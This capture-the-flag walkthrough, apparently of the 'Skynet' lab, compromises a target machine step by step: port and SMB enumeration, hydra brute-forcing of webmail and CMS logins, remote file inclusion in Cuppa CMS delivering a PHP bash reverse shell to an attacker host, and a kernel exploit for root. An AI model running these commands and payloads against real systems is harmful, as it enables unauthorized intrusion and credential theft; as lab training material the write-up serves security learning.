1. What is Miles password for his emails?

Port Scan

nmap -Pn <ip>

There’re 6 ports: 22, 80, 110, 139, 143, and 445.

High port scan

nmap -Pn -p1000- <ip>

OS and service scan

nmap -p 22,80,110,139,143,445 -A <ip>

There’re 6 services:
OpenSSH 7.2p2 (22),
Apache 2.4.18 (80),
Dovecot pop3d (110),
Samba (139),
Dovecot imap (143),
Samba (445).

Samba scan

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <ip>

There’re 2 directories that I can access: “anonymous” w/anonymous access, and “milesdyson”.

Vulnerable scan

nmap -p 22,80,110,139,143,445 --script vuln <ip>

There’s squirrelmail on HTTP site.

Access HTTP site

View page source

Try to use search function, nothing happens.

Let’s access “/squirrelmail”. It’s SquirrelMail version 1.4.23.

Search for exploits

searchsploit squirrelmail 1.4

Not much that I can use.

Further enumeration HTTP directory.

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<ip>/ -x php,txt,html,sh,cgi

Access other paths. Forbidden!!!.

Let’s access smb service.

smbclient //<ip>/anonymousls

There’re files and directories.

Download all of them

smbget -R smb://<ip>/anonymous

There’re 4 files which are interesting.

Read attention.txt

cat attention.txt

Seems like username may be miles, Miles, or milesdyson.

Read log file

cd logscat log1.txt

This might be some kind of username or password.

Try to brute force to milesdyson smb.

hydra -l milesdyson -P log1.txt smb -V


Let’s look into squirelmail. Maybe I can bruteforcing.

Try to input some data and intercept w/ burp suite.

Copy post data and craft hydra command

hydra -l <username> -P <password list> <ip> http-post-form "/<login url>:username=^USER^&password=^PASS^:F=incorrect" -V -F -u

Here’s my command.

hydra -l milesdyson -P log1.txt http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect." -V -F -u

Now I have password.

2. What is the hidden directory?

Let’s use cracked credential to login.

Access every mail. Now I have milesdyson’s smb password.

I also have possibility of user “skynet” exists.

This mail is a binary code.

I also have possibility of user “serenakogen” exists.

Decode with cyberchef. Just a string.

Access last mail. Just a string.

Access other mail’s directories. Nothing much.

Let’s login to milesdyson’s smb

smbclient //<ip>/milesdyson -U milesdysonls

Create directory to download files in it.

mkdir milesdysoncd milesdyson

Downloads files

smbget -R smb://<ip>/milesdyson -U milesdyson

Let’s read this file first.

cd notesls

Now I have hidden directory

3. What is the vulnerability called when you can include a remote file for malicious purposes?

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10
.10.201.86/45kra24zxs28v3yd/ -x php,txt,html,sh,cgi

It’s Cuppa CMS.

View page source, not useful

Try brute-forcing with password from log1.txt

hydra -l milesdyson -P log1.txt http-post-form "/45kra24zxs28v3yd/administrator
/:user=^^USER&password=^PASS^&task=login:F=Use a valid username and password to gain access to the administrator" -V -F -u

Let’s search for default credential. I came across to this.


Let’s search for public exploit

searchsploit cuppa

Copy it

searchsploit -m 25971

Let’s try accessing alertConfigField.php first



Intercept the request with Burp Suite and send to repeater.



There’re 2 users : root and milesdyson.

Let’s get the reverse shell

Prepare listener

nc -lvp 1234

Prepare php reverse shell and save as “reverse_shell.php”

<?phpexec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'");?>

Prepare HTTP Server to include the script

python -m SimpleHTTPServer 80

Back to Burp Suite Repeater, input:

?urlConfig=http://<attcker ip>/reverse_shell.php?

Back to listener, now I have a shell.

Search for user.txt

cd /homelscd milesdysonlscat user.txt

Let’s escalate privilege to root.

Verify If there’s any sudo.

sudo -l

Password is needed.

find / -perm -u=s -type f 2>/dev/null

Nothing much.

Let’s find kernel version

uname -a

Search for exploits

searchsploit linux kernel 4.8.0

Copy it

searchsploit -m 43418

Read it

Upload to /tmp

cd /tmpwget http://<ip>/43418.c

Complie it

gcc 43418.c -p pwn

Run it


Now I’m root.

Read root.txt

cd /rootlscat root.txt